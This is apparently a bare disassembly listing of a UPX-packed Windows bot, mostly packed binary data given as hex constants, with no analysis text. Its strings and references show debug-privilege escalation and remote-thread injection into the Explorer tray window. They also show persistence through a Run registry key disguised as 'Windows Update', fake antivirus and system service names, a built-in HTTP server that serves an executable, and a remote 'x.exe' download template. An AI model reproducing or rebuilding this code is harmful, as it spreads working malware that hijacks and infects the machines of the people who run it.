dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31604BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31604BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_316017DB+41B�o
; sub_316017DB+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31604C70: ; DATA XREF: sub_316017DB+44A�o
jmp short loc_31604C78
; ---------------------------------------------------------------------------
jmp short loc_31604C7A
; ---------------------------------------------------------------------------
align 8
loc_31604C78: ; CODE XREF: UPX0:loc_31604C70�j
; DATA XREF: sub_316017DB+5C�o
pop esp
pop esp
loc_31604C7A: ; CODE XREF: UPX0:31604C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31604C84 dd 1CEC8166h dword_31604C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31601D42+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31601D42+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31601D42+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31601D42+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31601D42+8�o
; sub_3160238C+11E�o
align 10h
aUterm18 db 'uterm18',0 ; DATA XREF: sub_31601DCA:loc_31601EAF�o
; UPX0:3160232B�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31601DCA+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31601DCA:loc_31601E11�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31601DCA+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31601DCA+18�o
align 4
dword_31604D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31602058+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31602058+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31602058+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_31602058+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31602316�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_3160238C+125�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3160238C+117�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_3160238C+110�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3160238C+103�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_3160238C+AF�o
align 4
aU18 db 'u18',0 ; DATA XREF: sub_3160238C+A8�o
aU17 db 'u17',0 ; DATA XREF: sub_3160238C+A1�o
aU16 db 'u16',0 ; DATA XREF: sub_3160238C+9A�o
aU15 db 'u15',0 ; DATA XREF: sub_3160238C+93�o
aU14 db 'u14',0 ; DATA XREF: sub_3160238C+8C�o
aU13i db 'u13i',0 ; DATA XREF: sub_3160238C+85�o
align 10h
aU13 db 'u13',0 ; DATA XREF: sub_3160238C+7E�o
aU12 db 'u12',0 ; DATA XREF: sub_3160238C+77�o
aU11 db 'u11',0 ; DATA XREF: sub_3160238C+70�o
aU10 db 'u10',0 ; DATA XREF: sub_3160238C+69�o
aU9 db 'u9',0 ; DATA XREF: sub_3160238C+62�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_3160238C+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_3160238C+54�o
align 10h
aU16x db 'u16x',0 ; DATA XREF: sub_3160238C+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3160238C+46�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_3160238C+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3160238C+38�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_3160238C+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3160238C+2A�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_3160238C+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_316026DE+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3160219E+23�o
; sub_316029B2+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_3160219E+1C�o
; sub_31602A60+87�o ...
align 4
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_316015C7+4F�o
; sub_31602B2C+57�o ...
align 4
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31602B2C+32�o
aClient db 'Client',0 ; DATA XREF: sub_31602B2C+BC�o
; sub_31602B2C+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31602B2C+37�o
; sub_31602B2C+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_316029B2+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_316029B2+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_316029B2+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_316029B2+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_316029B2+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_316029B2+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_316029B2+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_316029B2+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_316029B2+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_316029B2+F�o
align 4
a1: ; DATA XREF: sub_31602B2C+B7�o
unicode 0, <1>,0
dd 8 dup(0)
dword_31604FC8 dd 0 ; sub_3160219E+80�w
dword_31604FCC dd 0 ; sub_3160169C+64�o ...
dword_31604FD0 dd 0 ; sub_31602058:loc_31602106�r ...
dword_31604FD4 dd 68h ; UPX0:31602336�w ...
dword_31604FD8 dd 0 ; sub_3160238C+C0�w
dword_31604FDC dd 0 ; sub_316026DE+20�r
dword_31604FE0 dd 31600000h ; UPX0:3160231B�w
dword_31604FE4 dd 0 ; sub_3160169C+5B�o ...
dword_31604FE8 dd 0 ; UPX0:3160278D�w
word_31604FEC dw 0 ; DATA XREF: sub_3160252B+3B�r
; sub_3160258F:loc_316025F0�r ...
align 10h
dword_31604FF0 dd 0 ; sub_31602B2C+110�w
align 10h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31605000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 201h
dd 40D5FDh, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 10h, 0E000000h, 23h
dd 10h, 40h, 316000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 50h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 0F4000000h, 8C00002Ch, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 16000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 0F4000000h, 0Fh, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 0FC000040h, 0C300002Eh, 4D000044h
dd 0A0024A19h, 86954868h, 2162017h, 0BB217D03h, 0A73DB9AEh
dd 769F6801h, 0E44A20E6h, 3AB73666h, 1B5AB7CCh, 77684E0h
dd 6A3DB9A4h, 96F42A70h, 39C8608Ch, 5E364719h, 7A97640Ah
dd 2ECD0084h, 0A228F0D9h, 3C4B003Fh, 59B2A76Ch, 98C8B2CBh
dd 0EC0167E2h, 0DC23BDE8h, 57E500Fh, 90C6150Dh, 0DBA0B0Fh
dd 0C9D328C0h, 0C4E33B73h, 4E54908h, 88DB0C7Ah, 0F8492114h
dd 0BF762DC5h, 1CD66C84h, 0DE402EDBh, 1B4C7012h, 4440E7B0h
dd 4440BCF8h, 9C64358h, 101BDE50h, 0BD64EF1Eh, 0D94B7CDh
dd 0F9812197h, 0AD9FA7ACh, 80E87CFBh, 1624A5h, 52682506h
dd 1C969D1Ch, 761CC96Ch, 0D96F412h, 3F2677A7h, 6A6E0AEFh
dd 0C7BC87Ch, 92C78F0Fh, 7BC9BE49h, 64776454h, 2490E192h
dd 498C9FE9h, 0BB73330Dh, 0EDCF7824h, 0B0F88248h, 0C9014B0h
dd 266F415h, 8CCC66A1h, 7408707Ah, 3E264E5Eh, 5FF4743Ah
dd 761C2BA6h, 8602CFBEh, 0A87F24E4h, 0F805A435h, 0D741E06Ch
dd 37571282h, 0C45A7457h, 142B2FE4h, 4B74F80Eh, 4C25A068h
dd 0A8A4A2DDh, 0A3073D74h, 0A59FB616h, 0FFA04120h, 0E80FFC55h
dd 0D6EAE4B9h, 0AC507B5Ch, 0F00E9628h, 356CC002h, 0F85521FDh
dd 0E48C0009h, 0EC4EC1F0h, 2EF47558h, 0D8B1887h, 1C5BFFE0h
dd 983D072h, 573C418Bh, 2C68C103h, 0FB64BE4Dh, 34488B77h
dd 8950788Bh, 0B4A0F44Dh, 9A1C68D8h, 1BE062A5h, 1F0CFD8h
dd 0A5D97C3Bh, 120868ACh, 0DED74ECh, 18DB26D7h, 8211101Ch
dd 5914090Eh, 0FDA746F8h, 51F84DCBh, 0C5181850h, 971762C6h
dd 0B0632A68h, 0E96345Dh, 3CA1A4Ah, 0D6ED346Bh, 30EB6C0Eh
dd 5559AB19h, 0ADD47DF0h, 0CCDD5389h, 51F03E45h, 0BA967C4Fh
dd 0F853500Bh, 8CD435ACh, 9E0F13D6h, 6A17FA70h, 0D5B177D0h
dd 0EC55FEA6h, 574C73Bh, 991BEB32h, 61736E4Ch, 5986688Bh
dd 0EB05FC0Eh, 35480807h, 0EF747343h, 46390949h, 517A1B86h
dd 0F600951h, 83366931h, 0D8512C8h, 0ACDDB825h, 0AF6D0AEBh
dd 0ECB213B1h, 672D590Fh, 0C244CEBAh, 0BCB66AF9h, 12C49D3Ch
dd 500C80B7h, 507D50A8h, 0D35852E9h, 195DC02Ch, 2DE27C20h
dd 0B5431166h, 1914247Ch, 0B3D46E2Ch, 96177EEBh, 0FFAB261Ah
dd 61C280FFh, 461E1488h, 0E97CF73Bh, 3B2480h, 0DE335466h
dd 4465AEB6h, 0AC5A5F2Eh, 0E9DB5657h, 66A980C0h, 0DC732FA9h
dd 776C44B7h, 501950F0h, 0ACAA0056h, 0A01E1C77h, 27C49509h
dd 746449F4h, 0FA687B5Bh, 0C7FFF00Ch, 4CB64F08h, 0CC3434DBh
dd 754C2E2Ah, 0CD6B9D0Ah, 0BC500A6Ch, 54181A20h, 9F0B00Bh
dd 7FB807C6h, 404E013Bh, 0ED6F8E76h, 1008B0Ch, 448D5108h
dd 30215F24h, 0DB09A711h, 5903D32Ch, 43A10724h, 0CC15C277h
dd 0C82007BBh, 0DB32332Fh, 0C8E49E3Fh, 10E7C1F8h, 86A30B85h
dd 9033CDh, 125D8B02h, 3807CD33h, 9CDB8072h, 480CF69Eh
dd 0BDC65356h, 1C454011h, 2AABD9ADh, 0EC83C325h, 220135B4h
dd 17B5ADE7h, 0F2033366h, 359541F0h, 198DD868h, 683D9877h
dd 0D044B76Ch, 366474Fh, 54FECD8Bh, 9D14A54Dh, 0DAE1662Eh
dd 0F7007C54h, 34D7E06Fh, 0B933A1h, 3BC72B79h, 8B0272C1h
dd 7B94E1C1h, 292B5DBBh, 318C8A1h, 19AC23C7h, 0A6B7F12Dh
dd 1172233Dh, 4FF8786Ah, 0E146D18Bh, 0E113C4EBh, 37114650h
dd 0D467B279h, 6815941Eh, 166D0B3Ch, 6803726Bh, 3A3C9738h
dd 0ACEB31F4h, 52535453h, 48CD083h, 9824623Fh, 30FD04C2h
dd 0D1F6C121h, 0B1D1F457h, 5D0DE2D0h, 9C68F53Bh, 6F7C84Eh
dd 89806868h, 89DEEDB6h, 1827841Dh, 0C014EC4Ah, 3DADB3D4h
dd 6B00F275h, 1027B53h, 0D26B543Ah, 7780C504h, 0A39ACD28h
dd 741A4D0Ch, 0E1D59D2Fh, 0A3DCCDD9h, 6BA33F0Ch, 0FEE9784Ch
dd 5153FCA4h, 333A8656h, 0D8674B62h, 0F9265668h, 70FBE369h
dd 0C258195Eh, 0C05E0510h, 0A8499A5Eh, 0E80C4B56h, 0DDEC5D89h
dd 0D93BFB7h, 0FF25FF05h, 0C33A041Fh, 7443DCA3h, 837FA126h
dd 0CC8A1FE7h, 0DF74C984h, 16EA6B50h, 42F57C66h, 65A54039h
dd 90AFA664h, 7B440CE9h, 0C714F85Fh, 0D8BE8FEAh, 689E481Fh
dd 0F092058h, 670A1228h, 53E2EB2Fh, 43455FCFh, 0E60B30EBh
dd 0AE700190h, 0DA1E333Ch, 0D6B0DD66h, 0E6023E11h, 3CD86DD6h
dd 0B4803A98h, 0A3ABB068h, 0C11580E0h, 7C74E08Ch, 66C3047Bh
dd 1AD4A3ECh, 52B73DE4h, 0F766C045h, 0D29E0ECh, 0AE19043Eh
dd 4C34281Bh, 23BAB670h, 0EBEDC613h, 4FB5FB1Ah, 99881386h
dd 44D83569h, 60939070h, 694039B0h, 2C134490h, 665CD225h
dd 9B91C845h, 6EF61A1h, 40A0489Ch, 0E472391Ch, 30A838A4h
dd 20B028ACh, 8E472391h, 14B818B4h, 723910BCh, 0CC0C8E4h
dd 4C808C4h, 8E4700CCh, 0F8D01E7Ch, 0D8F4D44Dh, 2DECDCF0h
dd 0E02391CCh, 79E4E4E8h, 70045B35h, 6CC52904h, 6DCBC6A3h
dd 0FCA2D0EBh, 8839402h, 0B7261273h, 94D2E01Bh, 8E988533h
dd 0CFF5924h, 0C26CE8EBh, 0C1A6721h, 0E61A4EB8h, 39685F83h
dd 68397479h, 0A89D4DD4h, 4DB19313h, 64DCC29h, 242E5FC4h
dd 0BC0DBA4Ch, 5C930A8Ch, 0DE12FC8Eh, 219E6857h, 169C0E0Fh
dd 45C1E33Ah, 80342790h, 0D21E5174h, 0B414AE87h, 1388EA18h
dd 24E3EB8Eh, 65093C28h, 61A12615h, 247031B6h, 0A4805547h
dd 1F0AAD7Fh, 8A519F01h, 5C900B45h, 0EC380C1Eh, 52DB32FFh
dd 3831A43Ah, 108FEE5Dh, 8825DCDFh, 79E0B5Dh, 35B70FD7h
dd 0C067A4ECh, 99A6019Fh, 0D603FEF7h, 0D976FE8Fh, 80C3FE32h
dd 0BD72FFFBh, 7662AC5Eh, 0C09D935Fh, 3361F6A4h, 0B61D5868h
dd 84F21C2h, 631B0A81h, 5DCDACD8h, 75810B09h, 4DA49672h
dd 0C50F75B0h, 891E252Bh, 0CED6F20Fh, 0FF84323Dh, 8143D703h
dd 86DF38FBh, 9F88155Ah, 0D35D875Fh, 419D8B35h, 0A24C737Bh
dd 2B9E04B6h, 73F22FD8h, 0DF3C5BCDh, 0FEFF04FDh, 887F3CE8h
dd 362DB0F7h, 8BCF6B7Eh, 0DCE53B08h, 59D93BAAh, 0A0A33EECh
dd 572F9E57h, 12CF6C9Ch, 59F8C801h, 0B7128F13h, 0ADFF8712h
dd 0E4EE75B3h, 0F0D64761h, 0A6271068h, 9ED3BED3h, 0E0E0C04Bh
dd 0A91F7084h, 2956B142h, 0B4374E08h, 30197A8Fh, 9C5C5C5Dh
dd 7CCF6DE4h, 0DC2C3EF0h, 0CBB0030Bh, 456C180Dh, 11102D4Eh
dd 0AB01DF19h, 6C42BA77h, 0B80C6FBh, 2EC2C0DFh, 55612B5Ch
dd 63579356h, 76B3BC06h, 5105E6E4h, 0C34330E2h, 0FD1F0CA5h
dd 483776F4h, 5314546Ch, 20BF653h, 0ED38506Ah, 0E8CD02DFh
dd 0D2051E5Dh, 18740096h, 1C6B9809h, 10F3117Ah, 0EC281905h
dd 14384Eh, 1606D84Fh, 0EDAAADAh, 74AF9F84h, 0C7D5530Dh
dd 0F0D1051h, 39031108h, 3A18244Ch, 36C3B6EDh, 7EED85F4h
dd 26179711h, 0EF144D2Ch, 0C3BB60C9h, 0EBA20596h, 0B4750DF2h
dd 652DC583h, 68ECDDEBh, 646333Fh, 880D5C0Bh, 0B3BE150Ch
dd 6E9B0B11h, 1C140810h, 21843A5Dh, 5618D951h, 96C6C2EEh
dd 0F6182985h, 703D563Eh, 74E3188Eh, 610D2ADCh, 2DBA5964h
dd 102050C5h, 17E20818h, 9C03E05Bh, 8B550F5Eh, 6BAD6C6h
dd 2EFFD3CDh, 0C4532C56h, 56764C80h, 0C8270055h, 1722D672h
dd 40C520Ah, 1C931679h, 28A15D0Ch, 1C4F1501h, 13DE5306h
dd 9FB78B4Eh, 948E35B8h, 5C1E3C26h, 0F7794E36h, 0F10EB7F6h
dd 1FE8CBC1h, 7687AA4h, 3578B64Bh, 0D0E6D84Ch, 10B3408Bh
dd 0E0D92007h, 1C9B27BBh
dd 8D477DE2h, 6D011E74h, 1307FBFCh, 101456E8h, 0E0B5FF1Ch
dd 0BC82E645h, 0FFF37D4h, 0D08521Fh, 60CCCD87h, 76DC4650h
dd 0CE81C2BDh, 38B7895Ch, 8D8E0F75h, 57D0E06Ch, 744F88AFh
dd 0C85CD806h, 0DC472391h, 0E448E050h, 723CF93Ch, 0EC24E8E4h
dd 4EFCF018h, 9A2FECF4h, 7DB08326h, 744FBF0Ah, 0BE9C4C2Ch
dd 188B69E4h, 2C8A3459h, 5D9FC828h, 7B06C17Dh, 150E1775h
dd 89F60B1Dh, 37354C9Ah, 75B68E83h, 8C1361A5h, 55788114h
dd 0B3AD0974h, 74188FE8h, 636A8844h, 67027FA3h, 0A184A717h
dd 3E0831Bh, 5E95C083h, 420582F4h, 72105292h, 0C8C2170Dh
dd 3BDCFD10h, 0CC3DDC8Bh, 300E26D6h, 14CC387Bh, 6150E138h
dd 59DE84D0h, 2C20408Dh, 96F99598h, 71A3C62Ah, 0B3660D9Fh
dd 541441C4h, 0A61E01F4h, 7A3424Bh, 562E84E0h, 0DC64812Ch
dd 8310DBC5h, 0C7481F7Dh, 0F0254414h, 2FEF8452h, 6AE09E80h
dd 0C4BF501Dh, 0C151E871h, 3F3081EAh, 0EC1C3774h, 0AD030AFh
dd 0D1B86CBBh, 0C5F45352h, 5503306h, 0ED3D53BCh, 389BF735h
dd 590FEBB1h, 2DB632CEh, 689D020Bh, 0E81AE2E0h, 266581C6h
dd 0D1A468BBh, 66E768E0h, 0B9BB46CBh, 0AF5C1A0Dh, 0D71AC166h
dd 354C125Eh, 49D8DE12h, 0BBC631E7h, 0C823FD3Bh, 0AE2C1996h
dd 16C507F0h, 0C4816F2h, 0A66015EBh, 0CDA3101Ch, 0F03C0409h
dd 485743D5h, 3B44330Ch, 8B678B68h, 136A767Dh, 0ECFF4011h
dd 53373C8Ch, 10F8051Ch, 48D4F0F4h, 0CCD60Dh, 8F8D8151h
dd 0FB2FBEFDh, 0E9811472h, 85042D0Bh, 0EC731701h, 0F56FB62Bh
dd 0C48BC8EDh, 8BE18B0Ch, 5004D008h, 6443CCC3h, 46C6C6C2h
dd 4958055Ch, 45800000h, 97F100A0h, 65451E6h, 53522402h
dd 0E296EFFFh, 0CA803141h, 8DF50101h, 52791183h, 3AE42AECh
dd 0FFFFE7F6h, 9B49FFFFh, 0AFBEE0EAh, 447EDB21h, 615E1A95h
dd 1F85A032h, 0FF949F6Ah, 0A6843994h, 0CE358F26h, 0FFFF5C1Dh
dd 0C9A5FF43h, 657AB20Bh, 4D373072h, 6C697A6Fh, 342F616Ch
dd 2820302Eh, 6B7F6F63h, 706DFFFFh, 62697461h, 203B656Ch
dd 4549534Dh, 9153620h, 646E6957h, 8177776Fh, 2073FFBAh
dd 3520544Eh, 3429312Eh, 0D400C9E4h, 0BE79E704h, 0B4C40167h
dd 8090A00Eh, 0BEFBE79Eh, 0E680474h, 3C480958h, 0EC9B2674h
dd 4530D479h, 6F102220h, 4AF9E7C8h, 40F80030h, 0B6B7B613h
dd 767663FDh, 7E75722Eh, 65070077h, 65976C64h, 0C6DFEF6Fh
dd 65C1660Fh, 72616573h, 1F0E6863h, 6F626F72h, 6FFE5737h
dd 61686378h, 1FD2676Eh, 720C7465h, 8DB02E64h, 6962FB7Ch
dd 2861007Ah, 616B6863h, 6D740C6Dh, 6BB1737h, 24782Dh
dd 0E6F6C06h, 6DB7DE62h, 476B37B6h, 7A027626h, 1B76742Eh
dd 0DFB185B0h, 706F7411h, 69176E2Eh, 1F27730Fh, 3310ADB0h
dd 610F788Dh, 0DB6C7564h, 74E1766Fh, 694B652Dh, 6F338072h
dd 5873A66Eh, 4E6EDBE1h, 67622E74h, 3267694Fh, 0FBF6B6Fh
dd 61777800h, 62626A2Ch, 99B00ADh, 7AF676DFh, 0A8616661h
dd 23655D2Eh, 0FEDDAF5Ch, 626110FFh, 66656463h, 6A696867h
dd 6E6D6C6Bh, 0FF7271C5h, 0F7BF8DFFh, 78777675h, 41547A79h
dd 45444342h, 49484746h, 4D4C4B4Ah, 1F504F4Eh, 5197FB46h
dd 57565554h, 1B5A5958h, 74746823h, 0FD81DCDFh, 2F2F3A70h
dd 2F0B7325h, 702E9765h, 0DBF37068h, 0E3F85B7h, 73260F3Dh
dd 64066E63h, 666E6926h, 0DBEDB948h, 313D3B76h, 74132638h
dd 0B5DFA01Bh, 58EB3B07h, 3732313Dh, 3A3101A8h, 7303038h
dd 2FDF646Ch, 0DFDF65h, 7F5DDFE8h, 33FFFEDBh, 0EEB966C9h
dd 5758D01h, 68AFE8Bh, 4607993Ch, 46302C06h, 7F889934h
dd 7FF41A1h, 0EBEDE247h, 0B9DAE80Ah, 2E6765DFh, 0FF999371h
dd 0C9BFF6FFh, 0BDFD1201h, 716FD91h, 0AA6872C1h, 0AA66FD42h
dd 14BA10FDh, 8F98A91Ch, 1A7FBADDh, 0F198F3C9h, 71028608h
dd 5F9010C0h, 9FD87CCBh, 599237FDh, 3A781C96h, 7157E414h
dd 713A0A7Dh, 6DF7DC45h, 0F19DF39Fh, 0F1098904h, 77119C04h
dd 40E91FECh, 0E3F367B3h, 0DC1C10F0h, 6059B20Bh, 6F7FB1ECh
dd 125C99Bh, 0A10414D9h, 9E71CA17h, 0B230BD2Bh, 61688D7Ch
dd 0E21AAD91h, 6C111D96h, 289F6B7Bh, 0C850B2h, 57DC1499h
dd 0FF122555h, 4EFF6EF6h, 1291C0A4h, 0F7ED9949h, 0C4140054h
dd 71CBCA3Ah, 0EEEC3D3Bh, 24FF1C67h, 0CF1A21E4h, 668FCDCDh
dd 64FFDD2Ch, 1E3F819Bh, 83B8B0FBh, 5D12CDC3h, 0ED93C9A8h
dd 1DCBB37Ch, 0B24AD25h, 0FB264FF6h, 96A6485Ah, 4C1B14C0h
dd 0F3EBA729h, 0BECFBA9Ch, 16E95D9Fh, 7126F434h, 0F90EFCF5h
dd 0BBB37F3Bh, 29EF13FFh, 5F376B46h, 0EC4766DEh, 116A1A8h
dd 7DFFC5B7h, 0EDFF7B08h, 0FDE9ECE9h, 2CE1FCB7h, 0FCF5CA01h
dd 0EDFFFFFCh, 0FCF25ADFh, 0F5FCF7EBh, 0C7D6ABAAh, 59AAF934h
dd 2A2A25B4h, 93ACC966h, 85B78190h, 902FFB3Fh, 0C983639Dh
dd 309271CDh, 513519BFh, 7FFD914h, 0A95F761h, 712A9172h
dd 0A5D2EBC8h, 0E180D512h, 6FAA529Ah, 0FFDA37F6h, 9A2A8D14h
dd 8B12B9C8h, 0C3474A9Ah, 0DB9BAB9Eh, 0FF20A319h, 0ECFFFFEDh
dd 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h, 2E961FBDh
dd 0D812EB8Dh, 584F9A85h, 125AFE68h, 5A9A099Dh, 0D096F810h
dd 76664922h, 7FFDDB7Bh, 8712FEFDh, 95C25AA9h, 82128502h
dd 0CB5A9104h, 0DA033FCDh, 857FCFF7h, 424D53FFh, 7FA51872h
dd 0C853C84Eh, 62FEFFh, 83435002h, 0FFFF1ADFh, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 414C17CDh, 875A4D4Eh
dd 0A026B14h, 0B41566ABh, 0B795BADDh, 0BB676B03h, 330E7075h
dd 0B75BA5B0h, 4D27611Ah, 21583223h, 369A3232h, 2E32F953h
dd 2018D631h, 464A323Ch, 0A48BC19Eh, 0DF600773h, 0C62D42Eh
